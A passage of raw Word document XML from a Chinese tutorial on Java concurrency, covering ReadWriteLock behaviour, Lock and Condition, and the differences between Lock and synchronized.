          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这时候线程将保持</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Readlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的持有。反过来</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想要升级为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则不可能，为什么？参看</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，呵呵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6670F" w:rsidRPr="00E6670F" w:rsidRDefault="00E6670F" w:rsidP="00E6670F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(c).ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以被多个线程持有并且在作用时排斥任何的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则是完全的互斥。这一特性最为重要，因为对于高读取频率而相对较低写入的数据结构，使用此类锁同步机制则可以提高并发量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6670F" w:rsidRPr="00E6670F" w:rsidRDefault="00E6670F" w:rsidP="00E6670F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(d).</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不管是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Interrupt</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，语义与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E6670F" w:rsidRPr="008E20F8" w:rsidRDefault="00E6670F" w:rsidP="00E6670F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(e).WriteLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且与</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语义一致，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReadLock</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则不能使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，否则抛出</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UnsupportedOperationException</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6670F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00014A89" w:rsidRPr="00F41A4C" w:rsidRDefault="00014A89" w:rsidP="008E20F8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:lastRenderedPageBreak/>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="008E20F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">4  </w:t>
      </w:r>
      <w:r w:rsidR="00AE2DC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidR="00B96D53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00B96D53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00425AA0" w:rsidRDefault="00BD7453" w:rsidP="00CF2A27">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1914469"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="23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6" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1914469"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD7453" w:rsidRDefault="00BD7453" w:rsidP="00CF2A27">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000865ED" w:rsidRPr="00F41A4C" w:rsidRDefault="000865ED" w:rsidP="00CE5310">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="00CE5310">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001F5D9E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00317419" w:rsidRPr="00F41A4C">
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidR="00317419">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F2633" w:rsidRDefault="002101B8" w:rsidP="004F2633">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="004F2633" w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会自动释放锁，但是</w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一定要求程序员手工释放，并且必须在</w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从句中释放</w:t>
      </w:r>
      <w:r w:rsidR="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F2633" w:rsidRDefault="004F2633" w:rsidP="004F2633">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>功能性方面更全面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00096A46">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lock(),tryLock(),</w:t>
      </w:r>
      <w:r w:rsidR="00096A46" w:rsidRPr="00BD7453">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lockInterruptibly</w:t>
      </w:r>
      <w:r w:rsidR="004674B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F2633" w:rsidRPr="004F2633" w:rsidRDefault="004F2633" w:rsidP="004F2633">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>还提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5092">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:hyperlink r:id="rId148" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="002C5092">
          <w:rPr>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:b/>
            <w:color w:val="FF0000"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>线程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C5092">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的等待和唤醒等操作更加灵活</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以有多个</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实例，所以更有扩展性。</w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F2633">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F11B49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F11B49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在资源竞争不是很激烈的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
